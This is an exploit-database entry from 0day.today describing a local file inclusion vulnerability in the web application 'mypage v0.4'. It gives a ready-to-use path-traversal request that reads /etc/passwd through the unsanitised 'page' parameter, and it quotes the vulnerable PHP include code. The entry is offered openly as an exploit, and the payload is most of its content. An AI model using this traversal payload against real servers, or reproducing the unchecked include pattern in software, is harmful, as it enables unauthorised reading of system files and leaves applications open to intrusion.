[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

mypage v0.4 Local File Inclusion Vulnerability

Author
BAYBORA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10364
Category
web applications
Date add
22-12-2009
Platform
unsorted
==============================================
mypage v0.4 Local File Inclusion Vulnerability
==============================================

#############################################################
# mypage0.4 LFI Vulnerability
 
# Author: BAYBORA
 
##############################################################
 
# Exploit:
 
 
Vuln file: index.php?page=LFI
 
 
Exploit:
 
 
POST http://server/index.php?page=../../../../../../../../etc/passwd
 
index.php
 
if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}



#  0day.today [2024-11-15]  #